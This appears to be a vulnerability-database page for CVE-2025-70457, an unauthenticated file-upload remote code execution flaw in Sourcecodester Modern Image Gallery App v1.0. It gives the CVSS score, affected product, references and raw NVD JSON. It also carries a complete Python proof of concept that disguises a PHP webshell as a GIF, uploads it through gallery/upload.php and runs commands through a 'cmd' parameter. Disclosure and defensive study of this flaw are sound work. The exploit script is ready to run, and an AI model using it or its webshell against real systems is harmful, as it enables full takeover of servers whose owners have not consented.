CVE-2025-70457

Description

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:remyandrade:modern_image_gallery_app:1.0:*:*:*:*:*:*:* - VULNERABLE

Sourcecodester Modern Image Gallery App v1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-70457 PoC - Sourcecodester Modern Image Gallery App RCE
Author: Security Researcher
Description: Upload malicious PHP file disguised as image to achieve RCE
"""

import requests
import sys

TARGET_URL = "http://target-site.com"  # Replace with target URL
UPLOAD_ENDPOINT = f"{TARGET_URL}/gallery/upload.php"
GALLERY_PATH = "/gallery/"

def create_malicious_file():
    """Create a PHP webshell with image header to bypass MIME check"""
    # GIF89a header to bypass MIME type validation
    image_header = b'GIF89a;\n'
    # PHP webshell for command execution
    php_payload = b'<?php system($_GET["cmd"]); ?>'
    return image_header + php_payload

def exploit_cve_2025_70457():
    """Exploit the file upload vulnerability to achieve RCE"""
    files = {
        'image': ('shell.php', create_malicious_file(), 'image/gif')
    }
    
    print("[*] CVE-2025-70457 Exploitation")
    print(f"[*] Target: {TARGET_URL}")
    print("[*] Uploading malicious PHP file...")
    
    try:
        response = requests.post(UPLOAD_ENDPOINT, files=files, timeout=10)
        
        if response.status_code == 200:
            # Attempt to access uploaded shell
            shell_url = f"{TARGET_URL}{GALLERY_PATH}shell.php"
            print(f"[+] File uploaded successfully!")
            print(f"[+] Webshell URL: {shell_url}")
            print(f"[*] Example command: {shell_url}?cmd=whoami")
            
            # Verify exploitation
            verify = requests.get(f"{shell_url}?cmd=echo+vulnerable", timeout=10)
            if 'vulnerable' in verify.text:
                print("[+] RCE Confirmed! Server is vulnerable.")
                return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    exploit_cve_2025_70457()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70457/
[4] VulDB https://vuldb.com/cve/CVE-2025-70457
[5] https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983
[6] https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70457", "sourceIdentifier": "[email protected]", "published": "2026-01-23T22:16:15.243", "lastModified": "2026-01-30T17:59:24.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise."}, {"lang": "es", "value": "Una vulnerabilidad de ejecución remota de código (RCE) existe en Sourcecodester Modern Image Gallery App v1.0 dentro del componente gallery/upload.php. La aplicación no valida correctamente el contenido de los archivos subidos. Además, la aplicación conserva la extensión de archivo proporcionada por el usuario durante el proceso de guardado. Esto permite a un atacante no autenticado subir código PHP arbitrario suplantando el tipo MIME como una imagen, lo que lleva a un compromiso total del sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:modern_image_gallery_app:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "017F5B8E-C165-4C65-B0B9-F9A8B02E17E5"}]}]}], "references": [{"url": "https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}